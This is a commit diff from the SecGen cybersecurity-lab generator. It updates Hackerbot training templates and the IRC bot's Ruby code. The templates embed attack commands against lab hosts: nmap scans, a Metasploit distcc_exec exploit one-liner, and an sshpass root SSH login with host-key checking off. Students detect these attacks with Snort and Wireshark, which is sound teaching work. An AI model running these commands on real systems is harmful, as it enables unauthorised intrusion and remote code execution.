digital-forensics-labs/SecGen
1
0
Fork 0
mirror of https://github.com/cliffe/SecGen.git synced 2026-02-21 19:28:02 +00:00
Code Issues Packages Projects Releases Wiki Activity

lab updates

Browse Source
This commit is contained in:
Z. Cliffe Schreuders
2017-10-30 22:31:00 +00:00
parent cd3c21b514
commit 8817a3165b
6 changed files with 40 additions and 189 deletions
Download Patch File Download Diff File Expand all files Collapse all files

9
modules/generators/structured_content/hackerbot_config/hacker_vs_hackerbot_1/templates/lab.xml.erb
View File

@@ -62,8 +62,11 @@
<!--<get_shell>bash</get_shell>-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@{{chat_ip_address}} /bin/bash</get_shell>
<messages>
<greeting>Today you are about to be under attack.</greeting>
<show_attack_numbers />
<greeting>You are about to be attacked!</greeting>
<!--Must provide alternatives for each message-->
<say_ready>When you are ready, simply say 'ready'.</say_ready>
@@ -114,14 +117,14 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
<!-- Two random permission attacks-->
<%
$permission_attacks = ['file_perms_attack_1.xml.erb', 'file_perms_attack_2.xml.erb', 'file_perms_attack_3.xml.erb', 'file_perms_attack_4.xml.erb']
$permission_attacks = ['file_perms_attack_1.xml.erb', 'file_perms_attack_2.xml.erb', 'file_perms_attack_3.xml.erb', 'file_perms_attack_4.xml.erb'].shuffle
%>
<%= ERB.new(File.read self.templates_path + $permission_attacks.pop ).result(self.get_binding) %>
<%= ERB.new(File.read self.templates_path + $permission_attacks.pop ).result(self.get_binding) %>
<!-- Four random integrity attacks-->
<%
$integrity_attacks = ['integrity_attack1.xml.erb', 'integrity_attack2.xml.erb', 'integrity_attack3.xml.erb', 'integrity_attack4.xml.erb', 'integrity_attack5.xml.erb', 'integrity_attack6.xml.erb', 'integrity_attack7.xml.erb']
$integrity_attacks = ['integrity_attack1.xml.erb', 'integrity_attack2.xml.erb', 'integrity_attack3.xml.erb', 'integrity_attack4.xml.erb', 'integrity_attack5.xml.erb', 'integrity_attack6.xml.erb', 'integrity_attack7.xml.erb'].shuffle
%>
<%= ERB.new(File.read self.templates_path + $integrity_attacks.pop ).result(self.get_binding) %>
<%= ERB.new(File.read self.templates_path + $integrity_attacks.pop ).result(self.get_binding) %>

5
modules/generators/structured_content/hackerbot_config/ids/templates/lab.xml.erb
View File

@@ -230,7 +230,7 @@ I'm about to attack your system, use Snort to detect the method of attack.
<attack>
<pre_shell>nmap -sX <%= $web_server_ip %> > /dev/null; echo $? </pre_shell>
<shell>false</shell>
<get_shell>false</get_shell>
<post_command></post_command>
<prompt>#5 Your webserver is about to be scanned/attacked. Make sure you are using Snort to monitor your network...</prompt>
@@ -255,11 +255,10 @@ I'm about to attack your system, use Snort to detect the method of attack.
<trigger_next_attack />
</quiz>
<tutorial><%= ERB.new(File.read self.templates_path + 'snort.md.erb').result(self.get_binding) %></tutorial>
</attack>
<attack>
<shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</shell>
<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>
<post_command>whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! (in the network traffic)'</post_command>
<prompt>#6 Your webserver is about to be scanned/attacked. Use Tcpdump and/or Wireshark to view the behaviour of the attacker. There is a flag to be found over the wire. </prompt>

4
modules/generators/structured_content/hackerbot_config/ids/templates/write_snort_rules.md.erb
View File

@@ -57,9 +57,11 @@ echo 'alert tcp any any -> any 80 (msg: "Web traffic detected - ASDFGH"; sid:10
service snort restart
```
==**Don't forget to reload Snort every time you add or modify a rule!**==
**From your desktop VM**, browse to a website, and confirm the rule worked to generate an alert containing "ASDFGH". Note that Hackerbot will require you to include particular text within the alerts of the rules you write.
==Don't forget to reload Snort every time you add or modify a rule!==
# TODO RANDOM
# HACKERBOT ATTACKS

188
modules/generators/structured_content/hackerbot_config/ids_rules/templates/lab.xml.erb
View File

@@ -63,6 +63,8 @@
<get_shell>false</get_shell>
<messages>
<show_attack_numbers />
<greeting>Your web server is going to be attacked. I have inside information that will help you to monitor your network for the attacks. If you work with me I'll provide you with some flags.</greeting>
<!--Must provide alternatives for each message-->
@@ -112,193 +114,23 @@ Randomised instance generated by [SecGen](http://github.com/cliffe/SecGen) (<%=
<provide_tutorial>true</provide_tutorial>
</tutorial_info>
<!--<attack>-->
<!--<% $rand1 = SecureRandom.hex(2)-%>-->
<!--<pre_shell>curl -v -H 'Something-worth-noting: <%= $rand1 %>:<%= $flags.pop %>' <%= $web_server_ip %> > /dev/null; echo $? </pre_shell>-->
<!--<get_shell>false</get_shell>-->
<!--<post_command></post_command>-->
<!--<prompt>#1 Monitor the network traffic using Tcpdump or Wireshark, and look out for a string starting with "<%= $rand1 %>".</prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you found the flag! Moving on...</message>-->
<!--<trigger_next_attack>true</trigger_next_attack>-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to talk to the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>Ok, next up...</message>-->
<!--</else_condition>-->
<!--<tutorial><%= ERB.new(File.read self.templates_path + 'tcpdump.md.erb').result(self.get_binding) %></tutorial>-->
<!--</attack>-->
<!--<attack>-->
<!--<% $rand_port = rand(65535)-%>-->
<!--<pre_shell>nmap -p <%= $rand_port %> <%= $web_server_ip %> > /dev/null; echo $? </pre_shell>-->
<!--<get_shell>false</get_shell>-->
<!--<post_command></post_command>-->
<!--<prompt>#2 Monitor the network traffic, and look out for attempts to scan your webserver (<%= $web_server_ip %>). You need to identify what port the connection attempt is to.</prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you found the port number.</message>-->
<!--<trigger_quiz />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to scan the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--&lt;!&ndash;<else_condition>&ndash;&gt;-->
<!--&lt;!&ndash;<message>:( Something was not right...</message>&ndash;&gt;-->
<!--&lt;!&ndash;</else_condition>&ndash;&gt;-->
<!--<quiz>-->
<!--<question>Now after the attack, what port number was scanned?</question>-->
<!--<answer>^<%= $rand_port %>$</answer>-->
<!--<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>-->
<!--<trigger_next_attack />-->
<!--</quiz>-->
<!--</attack>-->
<!--&lt;!&ndash;-->
<!--# TODO MORE RANDOM HACKERBOT ATTACKS-->
<!--I'm about to attack your system, use Snort to detect the method of attack.-->
<!--&ndash;&gt;-->
<!--<attack>-->
<!--<pre_shell>nmap <%= $web_server_ip %> > /dev/null; echo $? </pre_shell>-->
<!--<get_shell>false</get_shell>-->
<!--<post_command></post_command>-->
<!--<prompt>#3 Your webserver is about to be scanned/attacked. Make sure you are using Snort to monitor your network...</prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you caught with Snort.</message>-->
<!--<trigger_quiz />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to scan the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>Ok...</message>-->
<!--</else_condition>-->
<!--<quiz>-->
<!--<question>Was that a scan or an attack?</question>-->
<!--<answer>^scan$</answer>-->
<!--<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>-->
<!--<trigger_next_attack />-->
<!--</quiz>-->
<!--<tutorial><%= ERB.new(File.read self.templates_path + 'snort.md.erb').result(self.get_binding) %></tutorial>-->
<!--</attack>-->
<!--<attack>-->
<!--<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>-->
<!--<post_command>whoami >> out;id >> out;touch hackerbotwashere; echo $?</post_command>-->
<!--<prompt>#4 Your webserver is about to be scanned/attacked. Make sure you are using Snort to monitor your network... This make take a while (a few minutes) please be patient.</prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you caught that.</message>-->
<!--<trigger_quiz />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to contact the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>:( Something was not right...</message>-->
<!--</else_condition>-->
<!--<quiz>-->
<!--<question>What vulnerable software was exploited?</question>-->
<!--<answer>distcc</answer>-->
<!--<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>-->
<!--<trigger_next_attack />-->
<!--</quiz>-->
<!--</attack>-->
<!--<attack>-->
<!--<pre_shell>nmap -sX <%= $web_server_ip %> > /dev/null; echo $? </pre_shell>-->
<!--<shell>false</shell>-->
<!--<post_command></post_command>-->
<!--<prompt>#5 Your webserver is about to be scanned/attacked. Make sure you are using Snort to monitor your network...</prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you caught that.</message>-->
<!--<trigger_quiz />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to scan the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>Ok...</message>-->
<!--</else_condition>-->
<!--<quiz>-->
<!--<question>What kind of scan was that?</question>-->
<!--<answer>^Xmas$</answer>-->
<!--<correct_answer_response>:) <%= $flags.pop %></correct_answer_response>-->
<!--<trigger_next_attack />-->
<!--</quiz>-->
<!--<tutorial><%= ERB.new(File.read self.templates_path + 'snort.md.erb').result(self.get_binding) %></tutorial>-->
<!--</attack>-->
<!--<attack>-->
<!--<shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</shell>-->
<!--<post_command>whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! (in the network traffic)'</post_command>-->
<!--<prompt>#6 Your webserver is about to be scanned/attacked. Use Tcpdump and/or Wireshark to view the behaviour of the attacker. There is a flag to be found over the wire. </prompt>-->
<!--<condition>-->
<!--<output_matches>0</output_matches>-->
<!--<message>Hope you caught that.</message>-->
<!--<trigger_next_attack />-->
<!--</condition>-->
<!--<condition>-->
<!--<output_matches>1</output_matches>-->
<!--<message>:( Failed to contact the web server (<%= $web_server_ip %>)</message>-->
<!--</condition>-->
<!--<else_condition>-->
<!--<message>:( Something was not right...</message>-->
<!--</else_condition>-->
<!--</attack>-->
<attack>
<!--shell on the backup server-->
<get_shell>sshpass -p <%= $root_password %> ssh -oStrictHostKeyChecking=no root@<%= $web_server_ip %> /bin/bash</get_shell>
<get_shell>msfconsole -x "use exploit/unix/misc/distcc_exec; set RHOST <%= $web_server_ip %>; exploit"</get_shell>
<post_command>whoami > /dev/null; echo "<%= $flags.pop %>" > /dev/null; echo 'Find the flag! (in the network traffic)'</post_command>
<!-- topic: Rsync-->
<prompt>It's your job to set up remote backups for <%= $second_user %> (a user on your system). Use rsync to create a full (epoch) remote backup of /home/<%= $second_user %> from your desktop system to the backup_server: <%= $web_server_ip %>:/home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>.</prompt>
<prompt>#6 Your webserver is about to be scanned/attacked. Use Tcpdump and/or Wireshark to view the behaviour of the attacker. There is a flag to be found over the wire. </prompt>
<post_command>ls /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/<%= $files.sample %> > /dev/null; echo $?</post_command>
<condition>
<output_matches>0</output_matches>
<message>:) Well done! <%= $flags.pop %></message>
<trigger_next_attack>true</trigger_next_attack>
<message>Hope you caught that.</message>
<trigger_next_attack />
</condition>
<condition>
<output_matches>No such file or directory</output_matches>
<message>:( You didn't copy to remote ssh /home/<%= $main_user %>/remote-rsync-full-backup/<%= $second_user %>/ Remember that the trailing / changes whether you are copying directories or their contents...</message>
<output_matches>1</output_matches>
<message>:( Failed to contact the web server (<%= $web_server_ip %>)</message>
</condition>
<else_condition>
<message>:( Doesn't look like you have backed up all of <%= $second_user %>'s files to /home/<%= $main_user %>/remote-rsync-backup/<%= $second_user %>. Try SSHing to the server and look at what you have backed up there.</message>
<message>:( Something was not right...</message>
</else_condition>
<tutorial><%= ERB.new(File.read self.templates_path + 'write_snort_rules.md.erb').result(self.get_binding) %></tutorial>

4
modules/generators/structured_content/hackerbot_config/ids_rules/templates/write_snort_rules.md.erb
View File

@@ -53,9 +53,9 @@ Lets create a basic rule that detects any web traffic on port 80.
```bash
echo "alert tcp any any -> any 80 (msg: "Web traffic detected - RANDOM"; sid:1000002; rev:1;)" >> /etc/snort/rules/my.rules
systemctl restart snort
sudo service snort restart
```
Browse to a website, and confirm the rule worked to generate an alert containing RANDOM.
Browse to a website, and confirm the rule worked to generate an alert containing the text 'RANDOM'.
# TODO RANDOM

19
modules/utilities/unix/hackerbot/files/opt_hackerbot/hackerbot.rb
View File

@@ -34,6 +34,9 @@ def check_output_conditions(bot_name, bots, current, lines, m)
sleep(1)
# prompt for current hack
if bots[bot_name]['messages'].key?('show_attack_numbers')
m.reply "** ##{current + 1} **"
end
m.reply bots[bot_name]['attacks'][current]['prompt']
else
m.reply bots[bot_name]['messages']['last_attack'].sample
@@ -130,6 +133,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for the first attack
if bots[bot_name]['messages'].key?('show_attack_numbers')
m.reply "** ##{current + 1} **"
end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
end
@@ -148,6 +154,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for current hack
if bots[bot_name]['messages'].key?('show_attack_numbers')
m.reply "** ##{current + 1} **"
end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -169,6 +178,9 @@ def read_bots (irc_server_ip_address)
current = bots[bot_name]['current_attack']
# prompt for current hack
if bots[bot_name]['messages'].key?('show_attack_numbers')
m.reply "** ##{current + 1} **"
end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -218,6 +230,9 @@ def read_bots (irc_server_ip_address)
sleep(1)
# prompt for current hack
if bots[bot_name]['messages'].key?('show_attack_numbers')
m.reply "** ##{current + 1} **"
end
m.reply bots[bot_name]['attacks'][current]['prompt']
m.reply bots[bot_name]['messages']['say_ready'].sample
else
@@ -369,9 +384,9 @@ def read_bots (irc_server_ip_address)
rescue # continue consuming until input blocks
end
begin
Timeout.timeout(5) do # timeout 10 sec
Timeout.timeout(15) do # timeout 10 sec
stdin.close # no more input, end the program
post_lines = stdout_err.read.chomp()
post_lines << stdout_err.read.chomp()
end
rescue Timeout::Error
Process.kill("KILL", wait_thr.pid)